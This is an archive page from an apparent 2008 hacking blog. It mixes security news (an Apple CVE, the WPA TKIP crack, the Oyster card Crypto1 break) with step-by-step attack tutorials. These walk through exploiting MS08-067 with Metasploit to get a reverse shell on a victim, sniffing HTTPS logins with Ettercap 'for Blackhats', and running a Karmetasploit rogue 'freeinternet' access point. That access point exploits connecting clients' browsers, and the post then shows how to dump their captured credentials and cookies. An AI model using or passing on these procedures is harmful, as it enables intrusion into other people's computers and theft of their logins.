Apple recently patched a vulnerability Nitesh “Leisure Suit” Dhanjani and I reported to them last week (CVE-2008-4216). We had reported a similar vulnerability to Apple about two months ago (CVE-2008-3638). In fact, the exploitation technique was so similar we held off releasing details until this 2nd patch was released.
The basic gist of this vulnerability pits a browser and a browser plug-in against each other in order to cross a subtle, but important boundary. The issue starts simply enough with a victim visiting an attackers webpage. Once on the attacker’s webpage, the attacker simply loads a Java Applet. Inside of the applet is a call to getAppletContext().showDocument(URL); Code here
Nov
21
Nov
21
The PDF document holds a single paged scan of an internally distributed mail from German telecommunications company T-Systems (Deutsche Telekom), revealing over two dozen secret IP address ranges in use by the German intelligence service Bundesnachrichtendienst (BND). Independent evidence shows that the claim is almost certainly true and the document itself has been verified by a demand letter from T-systems to Wikileaks. The LIST OF IPS
Nov
15
How to Exploit latest MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution).
1) First Download MS08-067 check tool from http://labs.portcullis.co.uk/application/ms08-067-check/
to see if the target host is vulnerable to this exploit.
2) unzip it tar -xvf ms08-067_check-0.5.tar.gz and cd ms08-067_check-0.5/
3) python ms08-067_check-0.5.py -t 192.168.1.101 (Check if the target Machine is Vulnerable or not)
my target is windows XP SP2
4) then open Framework3-MsfGUI.
3) and click exploit/windows/smb/ms08_067_netapi
4) then Select the Target OS and then use Windows/shell/reverse_tcp (payload)
5) add the Victim IP and leave the Default settings and click next now the paylaod runs
6) double click the Session and now u will get a Command Prompt of the Victim System.
below is the Video Tutorial for the above steps
This Tutorial is Deticated to my Close Friend Bond
Imagination by WirelessPunter
Nov
10
Yesterday Viruslist detected the onset of the latest mass hack attack – websites being hacked and links placed on them that lead to malicious servers. They were estimating that in the last two days along, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this.
How do the attacks work?
The attackers add a tag, to the html of hacked sites.)
** // more
Nov
9
WEP Wi-Fi security has been known as an easy-to-crack security protocol for a while now, which is why it was superseded by the more secure Wi-Fi Protected Access (WPA) standard. But now a PhD candidate studying encryption has found an exploit in the WPA standard that would allow a hacker to “send bogus data to an unsuspecting WiFi client,” completely compromising your Wi-Fi security and opening your network to all sorts of hacking. Lucky for you, it’s not terribly difficult to protect yourself against the new exploit.
The key: Just log into your router, switch off Temporal Key Integrity Protocol (TKIP) as an encryption mode, and use Advanced Encryption System (AES) only. TKIP is the only protocol that the hack applies to, so switching to AES-only will ensure that your Wi-Fi network is safe again. It’s quick and easy, so do yourself a favor and make the adjustment now so you don’t run into any problems in the future.
Nov
7
Security researchers have cracked the Wi-Fi Protected Access (WPA) encryption standard used to protect data on many wireless network according to a presentation at next week’s PacSec conference in Tokyo.
There, researcher Erik Tews will show how he was able to crack WPA encryption, in order to read data being sent from a router to a laptop computer. The attack could also be used to send bogus information to a client connected to the router.
To do this, Tews and his co-researcher Martin Beck found a way to break the Temporal Key Integrity Protocol (TKIP) key, used by WPA, in just 12 to 15 minutes, according to Dragos Ruiu, the conference’s organiser.
They have not, however, managed to crack the encryption keys used to secure data that goes from the PC to the router in this particular attack
Security experts had known that TKIP could be cracked using what’s known as a dictionary attack. Using massive computational resources, the attacker essentially cracks the encryption by making an extremely large number of educated guesses as to what key is being used to secure the wireless data.
The work of Tews and Beck does not involve a dictionary attack, however.
To pull off their trick, the researchers first discovered a way to trick a WPA router into sending them large amounts of data. This makes cracking the key easier, but this technique is also combined with a “mathematical breakthrough,” that lets them crack WPA much more quickly than any previous attempt, Ruiu said.
Tews is planning to publish the cryptographic work in an academic journal, Ruiu said. Some of the code used in the attack was quietly added to Beck’s Aircrack-ng Wi-Fi encryption hacking tool two weeks ago, he added.
WPA is widely used on today’s Wi-Fi networks and is considered a better alternative to the original WEP (Wired Equivalent Privacy) standard, which was developed in the late 1990s.
Soon after the development of WEP, however, hackers found a way to break its encryption and it is now considered insecure by most security professionals. Store chain T.J. Maxx was in the process of upgrading from WEP to WPA encryption when it experienced one of the most widely publicised data breaches in U.S. history, in which hundreds of millions of credit card numbers were stolen over a two-year period.
A new wireless standard known as WPA2 is considered safe from the attack developed by Tews and Beck, but many WPA2 routers also support WPA.
“Everybody has been saying, ‘Go to WPA because WEP is broken,’” Ruiu said. “This is a break in WPA.”
Nov
5
Hi Friends today
i will be showing little things on how to use Ettercap-NG for Blackhats
and below are the Topics i will be covering.
1) Sniffing HTTPS login passwords.
2) See the remote users Browsing websites.
3) Capturing remote users browser Images.
Of course we Dont recommend Breaking the law and its ur responsibility to check ur local
laws and abide by them Dont blame us when a three Letter Organization Knocks on your door
below is the Video tutorial
Etetrcap for Blackhats
Continued
Imagination By
WirelessPunter
http://thewifihack.com/blog/
Nov
3
A new open-source tool called Crapto1 could allow hackers free travel on the London Underground, by decrypting communication data between RFID chips and readers. The Oyster card system is based around the Mifare chip which uses an encryption algorithm called Crypto1. An attack against this algorithm was recently detailed in an academic paper from the University of Radboud in Holland, and it is this attack which Crapto1 implements.
“I’m not aware of any other public implementations at this time, I decided to write my own. This code implements the cryptography needed, to decrypt captured communications between crypto1 based tags and readers. And even recover the shared secret,” says the says the project homepage on Google Code
http://www.pcpro.co.uk/news/233463/oyster-hacked-by-opensource-tool.html
Nov
2
If you are used to Chrome then you should be aware of Incognito mode , if not then this Incognito mode will let you browse in a safer ways , Maybe you travel a lot with your laptop and don’t want a bunch of private information on a machine that might be stolen , but this mode is right now optional in Google Chrome if u need Incognito mode then u need to select that mode, If you need Google Chrome to open always in Incognito mode then. Michael T. Bee sent us a convenient script that starts up Chrome in incognito mode automatically. Here it is in all it’s glory:
//Chrome_Incognito.js - start new chrome incognito(sort of)
var liWait=175; //wait ms (double on older pc)var oSh=new ActiveXObject(”WScript.Shell”);
oSh.Run(”chrome.exe”); //start chrome
WScript.Sleep(liWait);
oSh.Sendkeys(”^+N”); //start new incognito window
WScript.Sleep(liWait);
oSh.Sendkeys(”%{Tab}”); //go previous(first) browser window
WScript.Sleep(liWait);
oSh.Sendkeys(”%{F4}”); //close first browser window
Just drop this in notepad and save it as chrome_incognito.js on your desktop. When you double click it, it will launch Chrome, make an incognito window, and then close the first window. It does all this by sending artificial keypress events to the application through the Shell ActiveX object, a technique which might come in handy for scripting other standard Windows applications
Nov
1
hi Friends Today i will be showing u how to have fun with Karmetsploit.
Prerequisites
1) Update Aircrack-ng
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
# make
# make install
2) Update Metasploit
click kde menu go to Backtrack—> Penetration–> framework3–>framework3-msfUpdate
3)then first check that ur wifi card is able to put ur card in Monitor mode and inject
Monitor mode : airmon-ng start wifi0 [wifi-interface]
Inject : aireplay-ng –test [monitor-interface]
aireplay-ng –test ath0
14:00:07 Trying broadcast probe requests…
14:00:09 No Answer…
14:00:09 Found 1 AP
14:00:09 Trying directed probe requests…
14:00:09 00:1C:10:26:A9:39 - channel: 11 - ‘linksys’
14:00:14 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
14:00:14 15/30: 50%
14:00:14 Injection is working!
cool if injection is not working then stop here and patch the drivers,
4)then download the karma.rc from the
http://metasploit.com/users/hdm/tools/karma.rc
and place in /pentest/exploits/framework3 and replace this file.
5)download the Karmetsploit from http://www.darkoperator.com/kmsapng.tgz
tar -xvf kmsapng.tgz
6)then open the kmsapng.sh from kwrite and add the path of metasploit in 149 row change the path to below
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc && cleanup
The script will do the following
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries
- Start Metasploit.
The script will crate a log file in /root called karma.log, as well as a sqlite db and a capture file all in the same folder.
7) and run the script from the terminal
./kmsapng.sh -i ath0 -m km -s freeinternet ( ath0 is ur card, linksys is your AP name u can give any thing)
8 ) now ur Fun AP is up ,
As clients connect to the access point and try to access the network, the service modules will do what they can to extract information from the client and exploit browser vulnerabilities. All of this information is logged to the SQLite3 database, which is specified as /root/karma.db in the sample resource file. At any time, the “db_notes” command can be used to look at the captured credentials and requests. Starting up tcpdump on the ath0 interface and capturing all traffic to a file is often a good idea as well, just in case something sensitive comes across the network that Metasploit doesn’t know about yet.
9) Finally see the creditentials and cookies logs using this command
sqlite3 karma.db
sqlite>.mode html
sqlite>.output karma.html
sqlite> select * from notes;
and u can see the details in karma.html
below is the link for video tutorial
Karmetasploit
Tutorial by
WirelessPunter